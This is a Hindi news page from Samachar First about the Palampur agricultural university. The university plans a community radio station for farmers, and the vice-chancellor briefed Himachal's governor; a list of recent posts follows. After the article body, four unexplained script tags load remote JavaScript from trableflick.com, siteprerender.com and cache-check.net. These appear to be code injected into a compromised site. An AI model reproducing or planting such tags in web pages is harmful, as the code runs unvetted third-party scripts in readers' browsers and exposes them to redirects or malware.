Categories: हिमाचल

कृषि विश्वविद्यालय पालमपुर किसानों के लिए सामुदायिक रेडियो स्टेशन करेगा शुरू

<p>किसानों को कृषि सम्बन्धी सूचना और नई तकनीक से जागरूक कराने के लिए कृषि विश्वविद्यालय पालमपुर जल्द ही समुदायिक रेडियो स्टेशन शुरू करेगा। चैधरी सरवण कुमार कृषि विश्वविद्यालय के कुलपति डॉ. एच.के.चैधरी ने बताया कि यह रेडियो स्टेशन जिला मंडी के सुन्दरनगर में स्थापित किया जाएगा। डॉ. एच.के. चैधरी ने राज्यपाल बंडारू दत्तात्रेय से राजभवन में भेंट की और उन्हें विश्वविद्यालय द्वारा की जा रही विभिन्न गतिविधियों और नवीन प्रयासों से अवगत करवाया।</p>

<p>कुलपति ने राज्यपाल को बताया कि हाल ही में हिमाचल प्रदेश के पूर्ण राज्यत्व की स्वर्ण जयंती समारोह के दौरान विश्वविद्यालय ने राज्य के प्रगतिशील किसानों के बारे में एक पुस्तिका प्रकाशित की है, जिन्होंने प्रदेश, राष्ट्र और अन्तरराष्ट्रीय स्तर पर कृषि क्षेत्र में बेहतर कार्य किए हैं। पुस्तिका का नाम एग्रीकलचर एम्बैस्डरस है। यह पुस्तिका अन्य किसानों को प्रशिक्षण और कृषि क्षेत्र में नई तकनीकें अपनाने के लिए प्रेरित करेगी। उन्होंने कहा कि विश्वविद्यालय में पहली बार किसान गैलरी स्थापित की गई है और जल्द ही सूचना प्रद्यौगिकी विभाग के सहायोग से विश्वविद्यालय में ई-ऑफिस की स्थापना भी की जायेगी। इसके अतिरिक्त विश्वविद्यालय की एक नई वैबसाईट भी प्रस्तावित है।</p>

<p>उन्होंने कहा कि एक फरवरी से ऑनलाइन कक्षाएं शुरू हो गई हैं और प्रवेश के इच्छुक सभी स्नातक और स्नातकोत्तर विद्यार्थियों के लिए 8 फरवरी से प्रवेश शुरू हो जाएगा। उन्होंने कहा कि लाहौल-स्पीति में स्नो ट्राउट संबंधी नई परियोजना पर कार्य चल रहा है ताकि मछली का उत्पादन बढ़ाया जा सके। इसके अतिरिक्त पालमपुर में गद्दी भेड़ों के लिए एक प्रयोगशाला स्थापित की जा रही है। राज्यपाल ने कृषि विश्वविद्यालय पालमपुर के प्रयासों की सराहना करते हुए कहा कि इस विश्वविद्यालय का कृषि क्षेत्र में अनुसंधान और विस्तार में महत्वपूर्ण योगदान है। उन्होंने नई तकनीकों और कृषि क्षेत्र के उन्नयन पर बल देते हुए कहा कि राष्ट्रीय शिक्षा नीति के अनुसार भविष्य की रणनीति पर कार्य किया जाए।</p>

<p><img src=”/media/gallery/images/image(2227).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1612233740158″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल हाईकोर्ट के नए मुख्य न्यायाधीश होंगे जीएस संधवालिया

Shimla: हिमाचल हाईकोर्ट के मुख्य न्यायाधीश जीएस संधवालिया होंगे। सर्वोच्च न्यायालय के कॉलेजियम ने केंद्र…

9 hours ago

आरएस बाली ने नवाजे UTT नेशनल रैंकिंग प्रतियोगिता के उत्कृष्ट खिलाड़ी

  रेनबो इंटरनेशनल स्कूल नगरोटा बगवां के खेलो इंडिया रेजिडेंशियल अकादमी में टूर्नामेंट संपन्‍न kangra:…

9 hours ago

द हंस फाउंडेशन द्वारा हेल्थ एंड वेलनेस सेंटर कनौन में स्वास्थ्य शिविर का किया गया आयोजन

द हंस फाउंडेशन की एमएमयू टीम द्वारा हेल्थ एंड वेलनेस सेंटर कनौन में स्वास्थ्य शिविर…

11 hours ago

राहुल गांधी के नेतृत्व में कांग्रेस हुई मजबूत, भाजपा नेता कुर्सी बचाने के लिए कर रहे टिप्‍पणियां

समाचार फर्स्‍ट नेटवर्क भाजपा नेता रवनीत बिट्टू और शिव सेना नेता की राहुल गांधी पर…

14 hours ago

अब देश में होगा ‘वन नेशन, वन इलेक्शन’, जानें इससे जुड़ी अहम बातें

समाचार फर्स्‍ट एजेंसी New Delhi: वन नेशन वन इलेक्शन होगा। यानि पूरे देश में एक…

15 hours ago

कांस्‍टेबल भर्ती का इंतजार खत्‍म, जानें कब शुरू होगी भर्ती

  Shimla/Chamba: हिमाचल प्रदेश में कांस्‍टेबल भर्ती जल्‍द होने वाली है। राज्य लोकसेवा आयोग जल्द…

15 hours ago